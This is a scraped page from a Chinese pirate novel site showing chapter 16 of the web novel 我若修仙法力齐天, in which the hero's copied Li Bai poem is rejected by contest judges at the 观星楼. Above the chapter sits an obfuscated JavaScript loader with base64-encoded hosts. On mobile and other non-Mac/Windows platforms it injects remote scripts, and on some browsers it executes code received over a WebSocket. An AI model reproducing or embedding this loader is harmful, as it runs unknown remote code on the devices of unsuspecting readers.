笔趣阁

字:
关灯 护眼
笔趣阁 > 我若修仙法力齐天 > 第十六章 溜须拍马
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十六章 溜须拍马

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“……不敢高声语,恐惊天上人。”
  随着朱元适念毕,一些人脸上浮现惊叹欣喜,而另一些人则是皱眉。
  一首绝佳的五言四句而又合乎律诗规范的小诗。
  诗中有着普通人的豪迈。
  但诗中又有了敬畏之心。
  对众人而言,若是将这首诗词挂在观星楼,那便代表着态度诚惶诚恐。
  观星楼可测天地,丈量国土,岂有不高声说话的道理。
  大唐也并不畏那天上人,否则便不会下狠手诛杀泾河龙王。
  这是人间界,不是那仙庭,即便神仙下凡也需要遵守大唐的规矩。
  有如此的底气,恐惊天上人便成了一桩笑话。
  诗是好诗,但作诗者处的阶层低了一些,难以看到全貌,诗词有了偏颇。
  难得一见的佳作,又有着嚼蜡般的难受。
  “李太白?”
  朱元适念完。
  他看了一下著名,看向了满脸黑墨的李鸿儒。
  对方这名字和脸色反差太大,让他难以忘怀。
  对方身上穿着四门馆学子服。
  看手脚上的粗糙,这显然不是因为练武导致。
  虽然与尉迟宝琳、荣才俊等人混到一起,但对方出生的阶层显然较低,大概率只是小官和平民的层次,需要忙于劳作。
  四门馆常年招生平民佼佼者,这大抵又是哪个杰出者了。
  这些平民会不断补充到七品以下的官员层次中,充当帝朝的底层支撑力量。
  但这批人的接触有限,难于清楚顶层之事。
  从对方的角度而言,这是上佳的五言诗,不可多得。
  但从他们的角度而言,这诗词再好也只能弃用。
  朱元适心中有着一丝不舍,随口主动念了出来,他想听听其他人的意见。
  “虽是上佳,但难以做用。”
  此前提示尉迟宝琳身份的长须长脸官员惋惜了一声。
  “可惜了这文采”另一人皱眉道:“这是我们评比以来见过最佳的诗词。”
  “简约而不简单,朗朗上口,着实可惜,我个人愿意出上十两纹银收录这首诗词,也算是不负了这才华。”
  “德言兄,这诗词在民间传传也便罢了,于我等只怕是有一些不妥。”
  “可惜!”
  数位审核官左右互看,低声议论时不由一番嘘唏。
  “主审大人,莫非这诗词不值钱?”
  听得朱元适叫自己,又看着几个审核官的脸色,李鸿儒的脸色从欣喜渐渐迈入低谷。
  他已经抄了一首颇为不错的高楼诗。
  这是大诗人李白之作。
  李鸿儒也不确定对方有没有在这方世界,但他读书时并未读过这类诗词,李白的佳作显然能拿来参赛。
  只是李鸿儒不曾想,便是李白的诗词都会落榜。
  他还想着捞点银子给李保国呢。
  “这诗好归好”朱元适摇头道:“但这首诗词不适合观星楼。”
  “莫非您是嫌我说这是危楼?”李鸿儒问道:“我能将危楼换成其他词呀。”
  李鸿儒想想自己的‘咏鸡’,那是第一次模仿,他修改甚多,几乎将骆宾王那首咏鹅弄得面目全非。
  他又不是什么循规蹈矩追求原诗词完美的人,诗词改改不是什么大问题。
  “危楼不危楼的问题不大”朱元适道:“只是着后两句话不搭意。”
  “不敢高声语,恐惊天上人,鸿儒兄,咱们……”
  一旁的荣才俊听了半响,终于察觉出了问题。
  他指了指天上,又指指观星楼和两人。
  正常人畏惧很正常,恐惊天上人没问题,但观星楼不需要恐,帝朝也不需要惊。
  这诗词再好观星楼也用不得。
  若非有尉迟宝琳在旁,李鸿儒这诗词只怕念上数遍便会丢到草篓中。
  “那我再换换!”
  知晓了关键性的问题,李鸿儒顿时就提笔了起来。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师